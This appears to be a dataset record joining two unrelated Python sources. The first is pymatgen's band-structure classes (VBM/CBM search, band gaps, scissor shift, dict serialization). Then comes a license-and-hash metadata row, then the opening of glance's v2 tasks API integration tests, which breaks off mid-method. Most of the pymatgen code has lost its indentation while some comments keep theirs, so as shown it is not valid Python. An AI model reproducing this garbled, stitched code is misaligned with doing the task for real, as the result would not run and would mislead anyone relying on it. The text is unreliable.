{Spin.up:[][],Spin.down:[][]}, the first index of the array
[][] refers to the band and the second to the index of the
kpoint. The kpoints are ordered according to the order of the
kpoints array. If the band structure is not spin polarized, we
only store one data set under Spin.up
lattice: The reciprocal lattice as a pymatgen Lattice object.
Pymatgen uses the physics convention of reciprocal lattice vectors
WITH a 2*pi coefficient
efermi: fermi energy
        labels_dict: (dict) of {label: kpoint} linking a kpoint (in frac
            coords or cartesian coordinates depending on coords_are_cartesian)
            to a label.
coords_are_cartesian: Whether coordinates are cartesian.
structure: The crystal structure (as a pymatgen Structure object)
associated with the band structure. This is needed if we
provide projections to the band structure
        projections: dict of orbital projections as {spin: ndarray}. The
            indices of the ndarray are [band_index, kpoint_index,
            orbital_index, ion_index]. If the band structure is not spin
            polarized, we only store one data set under Spin.up.
"""
def __init__(self, kpoints, eigenvals, lattice, efermi, labels_dict=None,
coords_are_cartesian=False, structure=None, projections=None):
self.efermi = efermi
self.lattice_rec = lattice
self.kpoints = []
self.labels_dict = {}
self.structure = structure
self.projections = projections or {}
self.projections = {k: np.array(v) for k, v in self.projections.items()}
if labels_dict is None:
labels_dict = {}
if len(self.projections) != 0 and self.structure is None:
raise Exception("if projections are provided a structure object"
" needs also to be given")
for k in kpoints:
# let see if this kpoint has been assigned a label
label = None
for c in labels_dict:
if np.linalg.norm(k - np.array(labels_dict[c])) < 0.0001:
label = c
self.labels_dict[label] = Kpoint(
k, lattice, label=label,
coords_are_cartesian=coords_are_cartesian)
self.kpoints.append(
Kpoint(k, lattice, label=label,
coords_are_cartesian=coords_are_cartesian))
self.bands = {spin: np.array(v) for spin, v in eigenvals.items()}
self.nb_bands = len(eigenvals[Spin.up])
self.is_spin_polarized = len(self.bands) == 2
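    # A minimal construction sketch (values are illustrative; ``rec_latt`` is
    # assumed to be a reciprocal Lattice as described in the docstring above):
    #
    #     kpts = [[0.0, 0.0, 0.0], [0.5, 0.0, 0.0]]
    #     eigenvals = {Spin.up: np.array([[-5.0, -4.5],   # band 0 at each kpoint
    #                                     [1.0, 2.0]])}   # band 1 at each kpoint
    #     bs = BandStructure(kpts, eigenvals, rec_latt, efermi=0.0)
    #     bs.nb_bands           # 2
    #     bs.is_spin_polarized  # False, only Spin.up data was given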
def get_projection_on_elements(self):
"""
Method returning a dictionary of projections on elements.
Returns:
a dictionary in the {Spin.up:[][{Element:values}],
Spin.down:[][{Element:values}]} format
            if there are no projections in the band structure,
            an empty dict is returned
"""
result = {}
structure = self.structure
for spin, v in self.projections.items():
result[spin] = [[collections.defaultdict(float)
for i in range(len(self.kpoints))]
for j in range(self.nb_bands)]
for i, j, k in itertools.product(range(self.nb_bands),
range(len(self.kpoints)),
range(structure.num_sites)):
result[spin][i][j][str(structure[k].specie)] += np.sum(
v[i, j, :, k])
return result
def get_projections_on_elements_and_orbitals(self, el_orb_spec):
"""
Method returning a dictionary of projections on elements and specific
orbitals
Args:
            el_orb_spec: A dictionary of Elements and Orbitals for which we
                want projections. It is given as: {Element: [orbitals]},
                e.g., {'Cu':['d','s']}
Returns:
A dictionary of projections on elements in the
{Spin.up:[][{Element:{orb:values}}],
Spin.down:[][{Element:{orb:values}}]} format
            if there are no projections in the band structure, an empty
            dict is returned.
"""
result = {}
structure = self.structure
el_orb_spec = {get_el_sp(el): orbs for el, orbs in el_orb_spec.items()}
for spin, v in self.projections.items():
result[spin] = [[{str(e): collections.defaultdict(float)
for e in el_orb_spec}
for i in range(len(self.kpoints))]
for j in range(self.nb_bands)]
for i, j, k in itertools.product(
range(self.nb_bands), range(len(self.kpoints)),
range(structure.num_sites)):
sp = structure[k].specie
for orb_i in range(len(v[i][j])):
o = Orbital(orb_i).name[0]
if sp in el_orb_spec:
if o in el_orb_spec[sp]:
result[spin][i][j][str(sp)][o] += v[i][j][
orb_i][k]
return result
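    # Usage sketch for the two projection helpers above (assumes ``bs`` was
    # built with a structure and projection data; element names illustrative):
    #
    #     elem_proj = bs.get_projection_on_elements()
    #     # elem_proj[Spin.up][band_index][kpoint_index] -> {"Cu": 0.7, "O": 0.1, ...}
    #     cu_proj = bs.get_projections_on_elements_and_orbitals({"Cu": ["d", "s"]})
    #     # cu_proj[Spin.up][band_index][kpoint_index]["Cu"]["d"] -> summed d weight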
def is_metal(self, efermi_tol=1e-4):
"""
Check if the band structure indicates a metal by looking if the fermi
level crosses a band.
Returns:
True if a metal, False if not
"""
for spin, values in self.bands.items():
for i in range(self.nb_bands):
if np.any(values[i, :] - self.efermi < -efermi_tol) and \
np.any(values[i, :] - self.efermi > efermi_tol):
return True
return False
def get_vbm(self):
"""
Returns data about the VBM.
Returns:
dict as {"band_index","kpoint_index","kpoint","energy"}
- "band_index": A dict with spin keys pointing to a list of the
indices of the band containing the VBM (please note that you
can have several bands sharing the VBM) {Spin.up:[],
Spin.down:[]}
- "kpoint_index": The list of indices in self.kpoints for the
kpoint vbm. Please note that there can be several
kpoint_indices relating to the same kpoint (e.g., Gamma can
occur at different spots in the band structure line plot)
- "kpoint": The kpoint (as a kpoint object)
- "energy": The energy of the VBM
- "projections": The projections along sites and orbitals of the
VBM if any projection data is available (else it is an empty
              dictionary). The format is similar to the projections field in
BandStructure: {spin:{'Orbital': [proj]}} where the array
[proj] is ordered according to the sites in structure
"""
if self.is_metal():
return {"band_index": [], "kpoint_index": [],
"kpoint": [], "energy": None, "projections": {}}
max_tmp = -float("inf")
index = None
kpointvbm = None
for spin, v in self.bands.items():
for i, j in zip(*np.where(v < self.efermi)):
if v[i, j] > max_tmp:
max_tmp = float(v[i, j])
index = j
kpointvbm = self.kpoints[j]
list_ind_kpts = []
if kpointvbm.label is not None:
for i in range(len(self.kpoints)):
if self.kpoints[i].label == kpointvbm.label:
list_ind_kpts.append(i)
else:
list_ind_kpts.append(index)
# get all other bands sharing the vbm
list_ind_band = collections.defaultdict(list)
for spin in self.bands:
for i in range(self.nb_bands):
if math.fabs(self.bands[spin][i][index] - max_tmp) < 0.001:
list_ind_band[spin].append(i)
proj = {}
for spin, v in self.projections.items():
if len(list_ind_band[spin]) == 0:
continue
proj[spin] = v[list_ind_band[spin][0]][list_ind_kpts[0]]
return {'band_index': list_ind_band,
'kpoint_index': list_ind_kpts,
'kpoint': kpointvbm, 'energy': max_tmp,
'projections': proj}
def get_cbm(self):
"""
Returns data about the CBM.
Returns:
{"band_index","kpoint_index","kpoint","energy"}
- "band_index": A dict with spin keys pointing to a list of the
indices of the band containing the VBM (please note that you
can have several bands sharing the VBM) {Spin.up:[],
Spin.down:[]}
- "kpoint_index": The list of indices in self.kpoints for the
kpoint vbm. Please note that there can be several
kpoint_indices relating to the same kpoint (e.g., Gamma can
occur at different spots in the band structure line plot)
- "kpoint": The kpoint (as a kpoint object)
- "energy": The energy of the VBM
- "projections": The projections along sites and orbitals of the
VBM if any projection data is available (else it is an empty
dictionnary). The format is similar to the projections field in
BandStructure: {spin:{'Orbital': [proj]}} where the array
[proj] is ordered according to the sites in structure
"""
if self.is_metal():
return {"band_index": [], "kpoint_index": [],
"kpoint": [], "energy": None, "projections": {}}
max_tmp = float("inf")
index = None
kpointcbm = None
for spin, v in self.bands.items():
for i, j in zip(*np.where(v >= self.efermi)):
if v[i, j] < max_tmp:
max_tmp = float(v[i, j])
index = j
kpointcbm = self.kpoints[j]
list_index_kpoints = []
if kpointcbm.label is not None:
for i in range(len(self.kpoints)):
if self.kpoints[i].label == kpointcbm.label:
list_index_kpoints.append(i)
else:
list_index_kpoints.append(index)
# get all other bands sharing the cbm
list_index_band = collections.defaultdict(list)
for spin in self.bands:
for i in range(self.nb_bands):
if math.fabs(self.bands[spin][i][index] - max_tmp) < 0.001:
list_index_band[spin].append(i)
proj = {}
for spin, v in self.projections.items():
if len(list_index_band[spin]) == 0:
continue
proj[spin] = v[list_index_band[spin][0]][list_index_kpoints[0]]
return {'band_index': list_index_band,
'kpoint_index': list_index_kpoints,
'kpoint': kpointcbm, 'energy': max_tmp,
'projections': proj}
def get_band_gap(self):
"""
Returns band gap data.
Returns:
A dict {"energy","direct","transition"}:
"energy": band gap energy
"direct": A boolean telling if the gap is direct or not
"transition": kpoint labels of the transition (e.g., "\\Gamma-X")
"""
if self.is_metal():
return {"energy": 0.0, "direct": False, "transition": None}
cbm = self.get_cbm()
vbm = self.get_vbm()
result = dict(direct=False, energy=0.0, transition=None)
result["energy"] = cbm["energy"] - vbm["energy"]
if (cbm["kpoint"].label is not None and cbm["kpoint"].label == vbm[
"kpoint"].label) \
or np.linalg.norm(cbm["kpoint"].cart_coords
- vbm["kpoint"].cart_coords) < 0.01:
result["direct"] = True
result["transition"] = "-".join(
[str(c.label) if c.label is not None else
str("(") + ",".join(["{0:.3f}".format(c.frac_coords[i])
for i in range(3)])
+ str(")") for c in [vbm["kpoint"], cbm["kpoint"]]])
return result
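    # Usage sketch (assumes ``bs`` is the band structure of a semiconductor):
    #
    #     gap = bs.get_band_gap()
    #     # e.g. {"energy": 1.1, "direct": False, "transition": "\\Gamma-X"}
    #     vbm, cbm = bs.get_vbm(), bs.get_cbm()
    #     # gap["energy"] == cbm["energy"] - vbm["energy"] by construction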
def get_direct_band_gap_dict(self):
"""
Returns a dictionary of information about the direct
band gap
Returns:
a dictionary of the band gaps indexed by spin
along with their band indices and k-point index
"""
if self.is_metal():
raise ValueError("get_direct_band_gap_dict should"
"only be used with non-metals")
direct_gap_dict = {}
for spin, v in self.bands.items():
above = v[np.all(v > self.efermi, axis=1)]
min_above = np.min(above, axis=0)
below = v[np.all(v < self.efermi, axis=1)]
max_below = np.max(below, axis=0)
diff = min_above - max_below
kpoint_index = np.argmin(diff)
band_indices = [np.argmax(below[:, kpoint_index]),
np.argmin(above[:, kpoint_index]) + len(below)]
direct_gap_dict[spin] = {"value": diff[kpoint_index],
"kpoint_index": kpoint_index,
"band_indices": band_indices}
return direct_gap_dict
def get_direct_band_gap(self):
"""
Returns the direct band gap.
Returns:
the value of the direct band gap
"""
if self.is_metal():
return 0.0
dg = self.get_direct_band_gap_dict()
return min(v['value'] for v in dg.values())
def get_sym_eq_kpoints(self, kpoint, cartesian=False, tol=1e-2):
"""
Returns a list of unique symmetrically equivalent k-points.
Args:
kpoint (1x3 array): coordinate of the k-point
cartesian (bool): kpoint is in cartesian or fractional coordinates
tol (float): tolerance below which coordinates are considered equal
Returns:
            ([1x3 array] or None): the list of equivalent kpoints, or None if
                the structure is not available
"""
if not self.structure:
return None
sg = SpacegroupAnalyzer(self.structure)
symmops = sg.get_point_group_operations(cartesian=cartesian)
points = np.dot(kpoint, [m.rotation_matrix for m in symmops])
rm_list = []
# identify and remove duplicates from the list of equivalent k-points:
for i in range(len(points) - 1):
for j in range(i + 1, len(points)):
if np.allclose(pbc_diff(points[i], points[j]), [0, 0, 0], tol):
rm_list.append(i)
break
return np.delete(points, rm_list, axis=0)
def get_kpoint_degeneracy(self, kpoint, cartesian=False, tol=1e-2):
"""
Returns degeneracy of a given k-point based on structure symmetry
Args:
kpoint (1x3 array): coordinate of the k-point
cartesian (bool): kpoint is in cartesian or fractional coordinates
tol (float): tolerance below which coordinates are considered equal
Returns:
(int or None): degeneracy or None if structure is not available
"""
all_kpts = self.get_sym_eq_kpoints(kpoint, cartesian, tol=tol)
if all_kpts is not None:
return len(all_kpts)
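    # Usage sketch (both helpers return None when ``bs.structure`` is not set):
    #
    #     bs.get_sym_eq_kpoints([0.5, 0.0, 0.0])     # symmetry-equivalent fractional kpoints
    #     bs.get_kpoint_degeneracy([0.5, 0.0, 0.0])  # their count, e.g. 6 for a cubic cell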
def as_dict(self):
"""
Json-serializable dict representation of BandStructureSymmLine.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"lattice_rec": self.lattice_rec.as_dict(), "efermi": self.efermi,
"kpoints": []}
        # kpoints are not kpoint object dicts but are frac coords (this makes
        # the dict smaller and avoids repetition of the lattice)
for k in self.kpoints:
d["kpoints"].append(k.as_dict()["fcoords"])
d["bands"] = {str(int(spin)): self.bands[spin]
for spin in self.bands}
d["is_metal"] = self.is_metal()
vbm = self.get_vbm()
d["vbm"] = {"energy": vbm["energy"],
"kpoint_index": vbm["kpoint_index"],
"band_index": {str(int(spin)): vbm["band_index"][spin]
for spin in vbm["band_index"]},
'projections': {str(spin): v.tolist() for spin, v in vbm[
'projections'].items()}}
cbm = self.get_cbm()
d['cbm'] = {'energy': cbm['energy'],
'kpoint_index': cbm['kpoint_index'],
'band_index': {str(int(spin)): cbm['band_index'][spin]
for spin in cbm['band_index']},
'projections': {str(spin): v.tolist() for spin, v in cbm[
'projections'].items()}}
d['band_gap'] = self.get_band_gap()
d['labels_dict'] = {}
d['is_spin_polarized'] = self.is_spin_polarized
for c in self.labels_dict:
d['labels_dict'][c] = self.labels_dict[c].as_dict()['fcoords']
d['projections'] = {}
if len(self.projections) != 0:
d['structure'] = self.structure.as_dict()
d['projections'] = {str(int(spin)): np.array(v).tolist()
for spin, v in self.projections.items()}
return d
@classmethod
def from_dict(cls, d):
"""
Create from dict.
Args:
            d (dict): A dict with all data for a band structure object.
Returns:
A BandStructure object
"""
labels_dict = d['labels_dict']
projections = {}
structure = None
if isinstance(list(d['bands'].values())[0], dict):
eigenvals = {Spin(int(k)): np.array(d['bands'][k]['data'])
for k in d['bands']}
else:
eigenvals = {Spin(int(k)): d['bands'][k] for k in d['bands']}
if 'structure' in d:
structure = Structure.from_dict(d['structure'])
if d.get('projections'):
projections = {Spin(int(spin)): np.array(v)
for spin, v in d["projections"].items()}
return BandStructure(
d['kpoints'], eigenvals,
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
@classmethod
def from_old_dict(cls, d):
"""
Args:
d (dict): A dict with all data for a band structure symm line
object.
Returns:
A BandStructureSymmLine object
"""
# Strip the label to recover initial string (see trick used in as_dict to handle $ chars)
labels_dict = {k.strip(): v for k, v in d['labels_dict'].items()}
projections = {}
structure = None
if 'projections' in d and len(d['projections']) != 0:
structure = Structure.from_dict(d['structure'])
projections = {}
for spin in d['projections']:
dd = []
for i in range(len(d['projections'][spin])):
ddd = []
for j in range(len(d['projections'][spin][i])):
dddd = []
for k in range(len(d['projections'][spin][i][j])):
ddddd = []
orb = Orbital(k).name
for l in range(len(d['projections'][spin][i][j][
orb])):
ddddd.append(d['projections'][spin][i][j][
orb][l])
dddd.append(np.array(ddddd))
ddd.append(np.array(dddd))
dd.append(np.array(ddd))
projections[Spin(int(spin))] = np.array(dd)
return BandStructure(
d['kpoints'], {Spin(int(k)): d['bands'][k] for k in d['bands']},
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
class BandStructureSymmLine(BandStructure, MSONable):
"""
This object stores band structures along selected (symmetry) lines in the
Brillouin zone. We call the different symmetry lines (ex: \\Gamma to Z)
"branches".
Args:
kpoints: list of kpoint as numpy arrays, in frac_coords of the
given lattice by default
eigenvals: dict of energies for spin up and spin down
{Spin.up:[][],Spin.down:[][]}, the first index of the array
[][] refers to the band and the second to the index of the
kpoint. The kpoints are ordered according to the order of the
kpoints array. If the band structure is not spin polarized, we
only store one data set under Spin.up.
lattice: The reciprocal lattice.
Pymatgen uses the physics convention of reciprocal lattice vectors
WITH a 2*pi coefficient
efermi: fermi energy
        labels_dict: (dict) of {label: kpoint} linking a kpoint (in frac
            coords or cartesian coordinates depending on coords_are_cartesian)
            to a label.
coords_are_cartesian: Whether coordinates are cartesian.
structure: The crystal structure (as a pymatgen Structure object)
associated with the band structure. This is needed if we
provide projections to the band structure.
        projections: dict of orbital projections as {spin: ndarray}. The
            indices of the ndarray are [band_index, kpoint_index,
            orbital_index, ion_index]. If the band structure is not spin
            polarized, we only store one data set under Spin.up.
"""
def __init__(self, kpoints, eigenvals, lattice, efermi, labels_dict,
coords_are_cartesian=False, structure=None,
projections=None):
super(BandStructureSymmLine, self).__init__(
kpoints, eigenvals, lattice, efermi, labels_dict,
coords_are_cartesian, structure, projections)
self.distance = []
self.branches = []
one_group = []
branches_tmp = []
# get labels and distance for each kpoint
previous_kpoint = self.kpoints[0]
previous_distance = 0.0
previous_label = self.kpoints[0].label
for i in range(len(self.kpoints)):
label = self.kpoints[i].label
if label is not None and previous_label is not None:
self.distance.append(previous_distance)
else:
self.distance.append(
np.linalg.norm(self.kpoints[i].cart_coords -
previous_kpoint.cart_coords) +
previous_distance)
previous_kpoint = self.kpoints[i]
previous_distance = self.distance[i]
if label:
if previous_label:
if len(one_group) != 0:
branches_tmp.append(one_group)
one_group = []
previous_label = label
one_group.append(i)
if len(one_group) != 0:
branches_tmp.append(one_group)
for b in branches_tmp:
self.branches.append(
{"start_index": b[0], "end_index": b[-1],
"name": str(self.kpoints[b[0]].label) + "-" +
str(self.kpoints[b[-1]].label)})
self.is_spin_polarized = False
if len(self.bands) == 2:
self.is_spin_polarized = True
def get_equivalent_kpoints(self, index):
"""
        Returns the list of kpoint indices equivalent (meaning they have the
        same frac coords) to the given one.
Args:
index: the kpoint index
Returns:
a list of equivalent indices
        TODO: now it uses the label; we might want to use coordinates instead
        (in case there was a mislabel)
"""
        # if the kpoint has no label it can't have a repetition along the band
        # structure line object
if self.kpoints[index].label is None:
return [index]
list_index_kpoints = []
for i in range(len(self.kpoints)):
if self.kpoints[i].label == self.kpoints[index].label:
list_index_kpoints.append(i)
return list_index_kpoints
def get_branch(self, index):
"""
        Returns the branch(es) in which the kpoint lies. There can be several
        branches.
Args:
index: the kpoint index
Returns:
A list of dictionaries [{"name","start_index","end_index","index"}]
indicating all branches in which the k_point is. It takes into
account the fact that one kpoint (e.g., \\Gamma) can be in several
branches
"""
to_return = []
for i in self.get_equivalent_kpoints(index):
for b in self.branches:
if b["start_index"] <= i <= b["end_index"]:
to_return.append({"name": b["name"],
"start_index": b["start_index"],
"end_index": b["end_index"],
"index": i})
return to_return
def apply_scissor(self, new_band_gap):
"""
Apply a scissor operator (shift of the CBM) to fit the given band gap.
        If it's a metal, we look for the band crossing the fermi level
        and shift this one up. This will not work all the time for metals!
Args:
            new_band_gap: the band gap the scissor band structure needs to have.
Returns:
a BandStructureSymmLine object with the applied scissor shift
"""
if self.is_metal():
# moves then the highest index band crossing the fermi level
# find this band...
max_index = -1000
# spin_index = None
for i in range(self.nb_bands):
below = False
above = False
for j in range(len(self.kpoints)):
if self.bands[Spin.up][i][j] < self.efermi:
below = True
if self.bands[Spin.up][i][j] > self.efermi:
above = True
if above and below:
if i > max_index:
max_index = i
# spin_index = Spin.up
if self.is_spin_polarized:
below = False
above = False
for j in range(len(self.kpoints)):
if self.bands[Spin.down][i][j] < self.efermi:
below = True
if self.bands[Spin.down][i][j] > self.efermi:
above = True
if above and below:
if i > max_index:
max_index = i
# spin_index = Spin.down
old_dict = self.as_dict()
shift = new_band_gap
for spin in old_dict['bands']:
for k in range(len(old_dict['bands'][spin])):
for v in range(len(old_dict['bands'][spin][k])):
if k >= max_index:
old_dict['bands'][spin][k][v] = \
old_dict['bands'][spin][k][v] + shift
else:
shift = new_band_gap - self.get_band_gap()['energy']
old_dict = self.as_dict()
for spin in old_dict['bands']:
for k in range(len(old_dict['bands'][spin])):
for v in range(len(old_dict['bands'][spin][k])):
if old_dict['bands'][spin][k][v] >= \
old_dict['cbm']['energy']:
old_dict['bands'][spin][k][v] = \
old_dict['bands'][spin][k][v] + shift
old_dict['efermi'] = old_dict['efermi'] + shift
return BandStructureSymmLine.from_dict(old_dict)
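    # Usage sketch (assumes ``bs_line`` is a semiconductor band structure whose
    # computed gap is too small, a common DFT situation):
    #
    #     corrected = bs_line.apply_scissor(1.5)
    #     corrected.get_band_gap()["energy"]  # ~1.5; the CBM and everything above it is shifted up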
def as_dict(self):
"""
Json-serializable dict representation of BandStructureSymmLine.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"lattice_rec": self.lattice_rec.as_dict(), "efermi": self.efermi,
"kpoints": []}
        # kpoints are not kpoint object dicts but are frac coords (this makes
        # the dict smaller and avoids repetition of the lattice)
for k in self.kpoints:
d["kpoints"].append(k.as_dict()["fcoords"])
d["branches"] = self.branches
d["bands"] = {str(int(spin)): self.bands[spin].tolist()
for spin in self.bands}
d["is_metal"] = self.is_metal()
vbm = self.get_vbm()
d["vbm"] = {"energy": vbm["energy"],
"kpoint_index": vbm["kpoint_index"],
"band_index": {str(int(spin)): vbm["band_index"][spin]
for spin in vbm["band_index"]},
'projections': {str(spin): v.tolist() for spin, v in vbm[
'projections'].items()}}
cbm = self.get_cbm()
d['cbm'] = {'energy': cbm['energy'],
'kpoint_index': cbm['kpoint_index'],
'band_index': {str(int(spin)): cbm['band_index'][spin]
for spin in cbm['band_index']},
'projections': {str(spin): v.tolist() for spin, v in cbm[
'projections'].items()}}
d['band_gap'] = self.get_band_gap()
d['labels_dict'] = {}
d['is_spin_polarized'] = self.is_spin_polarized
        # MongoDB does not accept keys starting with $. Add a blank space to fix the problem
for c in self.labels_dict:
mongo_key = c if not c.startswith("$") else " " + c
d['labels_dict'][mongo_key] = self.labels_dict[c].as_dict()[
'fcoords']
if len(self.projections) != 0:
d['structure'] = self.structure.as_dict()
d['projections'] = {str(int(spin)): np.array(v).tolist()
for spin, v in self.projections.items()}
return d
@classmethod
def from_dict(cls, d):
"""
Args:
d (dict): A dict with all data for a band structure symm line
object.
Returns:
A BandStructureSymmLine object
"""
try:
# Strip the label to recover initial string (see trick used in as_dict to handle $ chars)
labels_dict = {k.strip(): v for k, v in d['labels_dict'].items()}
projections = {}
structure = None
if d.get('projections'):
if isinstance(d["projections"]['1'][0][0], dict):
raise ValueError("Old band structure dict format detected!")
structure = Structure.from_dict(d['structure'])
projections = {Spin(int(spin)): np.array(v)
for spin, v in d["projections"].items()}
return BandStructureSymmLine(
d['kpoints'], {Spin(int(k)): d['bands'][k]
for k in d['bands']},
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
except:
warnings.warn("Trying from_dict failed. Now we are trying the old "
"format. Please convert your BS dicts to the new "
"format. The old format will be retired in pymatgen "
"5.0.")
return BandStructureSymmLine.from_old_dict(d)
@classmethod
def from_old_dict(cls, d):
"""
Args:
d (dict): A dict with all data for a band structure symm line
object.
Returns:
A BandStructureSymmLine object
"""
# Strip the label to recover initial string (see trick used in as_dict to handle $ chars)
labels_dict = {k.strip(): v for k, v in d['labels_dict'].items()}
projections = {}
structure = None
if 'projections' in d and len(d['projections']) != 0:
structure = Structure.from_dict(d['structure'])
projections = {}
for spin in d['projections']:
dd = []
for i in range(len(d['projections'][spin])):
ddd = []
for j in range(len(d['projections'][spin][i])):
dddd = []
for k in range(len(d['projections'][spin][i][j])):
ddddd = []
orb = Orbital(k).name
for l in range(len(d['projections'][spin][i][j][
orb])):
ddddd.append(d['projections'][spin][i][j][
orb][l])
dddd.append(np.array(ddddd))
ddd.append(np.array(dddd))
dd.append(np.array(ddd))
projections[Spin(int(spin))] = np.array(dd)
return BandStructureSymmLine(
d['kpoints'], {Spin(int(k)): d['bands'][k]
for k in d['bands']},
Lattice(d['lattice_rec']['matrix']), d['efermi'],
labels_dict, structure=structure, projections=projections)
def get_reconstructed_band_structure(list_bs, efermi=None):
"""
This method takes a list of band structures and reconstructs
one band structure object from all of them.
    This is typically very useful when you split non-self-consistent
    band structure runs into several independent jobs and want to merge
    the results back
Args:
list_bs: A list of BandStructure or BandStructureSymmLine objects.
        efermi: The Fermi energy of the reconstructed band structure. If
            None, an average of the Fermi energies of all the objects in
            list_bs is used.
Returns:
A BandStructure or BandStructureSymmLine object (depending on
the type of the list_bs objects)
"""
if efermi is None:
efermi = sum([b.efermi for b in list_bs]) / len(list_bs)
kpoints = []
labels_dict = {}
rec_lattice = list_bs[0].lattice_rec
nb_bands = min([list_bs[i].nb_bands for i in range(len(list_bs))])
kpoints = np.concatenate([[k.frac_coords for k in bs.kpoints]
for bs in list_bs])
dicts = [bs.labels_dict for bs in list_bs]
labels_dict = {k: v.frac_coords for d in dicts for k, v in d.items()}
eigenvals = {}
eigenvals[Spin.up] = np.concatenate([bs.bands[Spin.up][:nb_bands]
for bs in list_bs], axis=1)
if list_bs[0].is_spin_polarized:
eigenvals[Spin.down] = np.concatenate([bs.bands[Spin.down][:nb_bands]
for bs in list_bs], axis=1)
projections = {}
if len(list_bs[0].projections) != 0:
projs = [bs.projections[Spin.up][:nb_bands] for bs in list_bs]
projections[Spin.up] = np.concatenate(projs, axis=1)
if list_bs[0].is_spin_polarized:
projs = [bs.projections[Spin.down][:nb_bands] for bs in list_bs]
projections[Spin.down] = np.concatenate(projs, axis=1)
if isinstance(list_bs[0], BandStructureSymmLine):
return BandStructureSymmLine(kpoints, eigenvals, rec_lattice,
efermi, labels_dict,
structure=list_bs[0].structure,
projections=projections)
else:
return BandStructure(kpoints, eigenvals, rec_lattice, efermi,
labels_dict, structure=list_bs[0].structure,
projections=projections)
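# Usage sketch (assumes ``bs_parts`` is a list of BandStructureSymmLine objects
# coming from separate non-self-consistent runs over different kpoint segments):
#
#     full_bs = get_reconstructed_band_structure(bs_parts)
#     full_bs.get_band_gap()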
| mit | -676,974,746,694,923,400 | 39.97446 | 101 | 0.53282 | false |
darren-wang/gl | glance/tests/integration/v2/test_tasks_api.py | 5 | 20030 | # Copyright 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from oslo.serialization import jsonutils as json
from oslo_utils import timeutils
from glance.api.v2 import tasks
from glance.tests.integration.v2 import base
TENANT1 = '6838eb7b-6ded-434a-882c-b344c77fe8df'
TENANT2 = '2c014f32-55eb-467d-8fcb-4bd706012f81'
TENANT3 = '5a3e60e8-cfa9-4a9e-a90a-62b42cea92b8'
TENANT4 = 'c6c87f25-8a94-47ed-8c83-053c25f42df4'
def minimal_task_headers(owner='tenant1'):
headers = {
'X-Auth-Token': 'user1:%s:admin' % owner,
'Content-Type': 'application/json',
}
return headers
def _new_task_fixture(**kwargs):
task_data = {
"type": "import",
"input": {
"import_from": "http://example.com",
"import_from_format": "qcow2",
"image_properties": {
'disk_format': 'vhd',
'container_format': 'ovf'
}
}
}
task_data.update(kwargs)
return task_data
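# The fixture above merges keyword overrides into the default task body via
# dict.update, e.g. (illustrative only):
#
#     _new_task_fixture(type="invalid")            # replaces the "type" key
#     _new_task_fixture(task_input="{bad: json}")  # adds a new "task_input" key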
class TestTasksApi(base.ApiTest):
def __init__(self, *args, **kwargs):
super(TestTasksApi, self).__init__(*args, **kwargs)
self.api_flavor = 'fakeauth'
self.registry_flavor = 'fakeauth'
def _wait_on_task_execution(self):
"""Wait until all the tasks have finished execution and are in
state of success or failure.
"""
start = timeutils.utcnow()
# wait for maximum of 5 seconds
while timeutils.delta_seconds(start, timeutils.utcnow()) < 5:
wait = False
# Verify that no task is in status of pending or processing
path = "/v2/tasks"
res, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
content_dict = json.loads(content)
self.assertEqual(200, res.status)
res_tasks = content_dict['tasks']
if len(res_tasks) != 0:
for task in res_tasks:
if task['status'] in ('pending', 'processing'):
wait = True
break
if wait:
time.sleep(0.05)
continue
else:
break
def _post_new_task(self, **kwargs):
task_owner = kwargs.get('owner')
headers = minimal_task_headers(task_owner)
task_data = _new_task_fixture()
task_data['input']['import_from'] = "http://example.com"
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(path, 'POST',
headers=headers,
body=body_content)
self.assertEqual(201, response.status)
task = json.loads(content)
task_id = task['id']
self.assertIsNotNone(task_id)
self.assertEqual(task_owner, task['owner'])
self.assertEqual(task_data['type'], task['type'])
self.assertEqual(task_data['input'], task['input'])
return task, task_data
def test_all_task_api(self):
# 0. GET /tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
content_dict = json.loads(content)
self.assertEqual(200, response.status)
self.assertFalse(content_dict['tasks'])
# 1. GET /tasks/{task_id}
# Verify non-existent task
task_id = 'NON_EXISTENT_TASK'
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(404, response.status)
# 2. POST /tasks
# Create a new task
task_owner = 'tenant1'
data, req_input = self._post_new_task(owner=task_owner)
# 3. GET /tasks/{task_id}
# Get an existing task
task_id = data['id']
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
# 4. GET /tasks
# Get all tasks (not deleted)
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
self.assertIsNotNone(content)
data = json.loads(content)
self.assertIsNotNone(data)
self.assertEqual(1, len(data['tasks']))
# NOTE(venkatesh) find a way to get expected_keys from tasks controller
expected_keys = set(['id', 'expires_at', 'type', 'owner', 'status',
'created_at', 'updated_at', 'self', 'schema'])
task = data['tasks'][0]
self.assertEqual(expected_keys, set(task.keys()))
self.assertEqual(req_input['type'], task['type'])
self.assertEqual(task_owner, task['owner'])
self.assertEqual('success', task['status'])
self.assertIsNotNone(task['created_at'])
self.assertIsNotNone(task['updated_at'])
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_task_schema_api(self):
# 0. GET /schemas/task
# Verify schema for task
path = "/v2/schemas/task"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
schema = tasks.get_task_schema()
expected_schema = schema.minimal()
